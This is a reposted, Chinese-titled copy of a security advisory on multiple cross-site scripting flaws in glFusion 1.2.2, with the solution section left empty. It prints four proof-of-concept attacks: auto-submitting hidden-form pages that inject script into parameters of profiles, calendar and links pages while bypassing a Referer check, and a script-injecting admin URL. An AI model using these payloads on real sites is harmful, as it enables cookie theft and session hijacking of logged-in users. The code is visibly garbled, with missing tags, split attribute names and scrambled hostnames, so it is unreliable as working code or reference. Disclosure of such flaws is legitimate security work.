glFusion 1.2.2 多个xss缺陷及修复 - 网站安全 - 自学

影响产品： glFusion

开发者: http://HdhCmsTestglfusion.org/

缺陷影响版本: 1.2.2 and probably prior

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in glFusion, which can be exploited to perform Cross-Site Scripting attacks.

glFusion has a "bad_behaviour" plugin (installed by default) that verifies HTTP Referer, aimed to protect against spambots. The plugin also makes reflected XSS attacks against the application a little bit more complex. To bypass the security restriction PoC (Proof-of-Concept) codes for vulnerabilities 1.1 – 1.3 modify the HTTP Referer header. These PoCs were successfully tested in the latest available version of Mozilla Firefox (18.0.1) .

1.1 The vulnerability exists due to insufficient filtration of user-supplied data in "subject" HTTP POST parameter passed to "/profiles.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The PoC code below uses "alert()" Java Script function to display user's cookies:

< html >

<head>

</head>

<body>

function go2() { location.replace("") }

function go() {

if(x) return

try {

var html = '<form target="_parent" action="http://[host]/profiles.php" method="post">'

html += '<input type="hidden" name="uid" value="2">'

html += '<input type="hidden" name="author" value="author">'

html += '<input type="hidden" name="message" value="1">'

html += '<input type="hidden" name="message_html" value="1">'

html += '<input type="hidden" name="authoremail" value="mail@mail测试数据">'

html += '<input type="hidden" name="postmode" value="html">'

html += '<input type="hidden" name="what" value="contact">'

html += '<input type="hidden" name="subject" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'

window.frames[0].document.body.innerHTML = html

window.frames[0].document.forms[0].submit()

} catch(e) {

go2()

}

</script>

</iframe>

window.setTimeout('go2()', 3333)

</script>

</body>

</html>

1.2 The vulnerabilities exist due to insufficient filtration of user-supplied data in "address1", "address2", "calendar_type", "city", "state", "title", "url", "zipcode" HTTP POST parameters passed to "/calendar/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in user’s browser in context of the vulnerable website.

The PoC code below uses "alert()" JavaScript function to display user's cookies:

<html>

<head>

</head>

<body>

function go2() { location.replace("") }

function go() {

if(x) return

try {

var html = '<form target="_parent" action="http://[host]/calendar/index.php" method="post">'

html += '<input type="hidden" name="mode" value="Submit">'

html += '<input type="hidden" name="savecal" value="Submit">'

html += '<input type="hidden" name="address1" value=\'" onmou seo ver="javascript:alert(document.cookie);"\'>'

html += '<input type="hidden" name="calendar_type" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'

html += '<input type="hidden" name="city" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'

html += '<input type="hidden" name="state" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'

html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'

html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'

html += '<input type="hidden" name="zipcode" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'

html += '<input type="hidden" name="address2" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'

window.frames[0].document.body.innerHTML = html

window.frames[0].document.forms[0].submit()

} catch(e) {

go2()

}

</script>

</iframe>

window.setTimeout('go2()', 3333)

</script>

</body>

</html>

1.3 The vulnerabilities exists due to insufficient filtration of user-supplied data in "title" and "url" HTTP POST parameters passed to "/links/index.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The PoC code below uses "alert()" JavaScript function to display user's cookies:

<html>

<head>

</head>

<body>

function go2() { location.replace("") }

function go() {

if(x) return

try {

var html = '<form target="_parent" action="http:// HdhCmsTest2cto测试数据 /links/index.php" method="post">'

html += '<input type="hidden" name="mode" value="Submit">'

html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(1);"\'>'

html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(2);"\'></form>'

window.frames[0].document.body.innerHTML = html

window.frames[0].document.forms[0].submit()

} catch(e) {

go2()

}

</script>

</iframe>

window.setTimeout('go2()', 3333)

</script>

</body>

</html>

1.4 The vulnerability exists due to insufficient filtration of user-supplied data in URI after "/admin/plugins/mediagallery/xppubwiz.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The PoC code below uses "alert()" JavaScript function to display user's cookies:

http://HdhCmsTest2cto测试数据 /admin/plugins/mediagallery/xppubwiz.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/

-----------------------------------------------------------------------------------------------

解决方案:

More Information:

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did14133

更新时间：2022-09-13 阅读：49次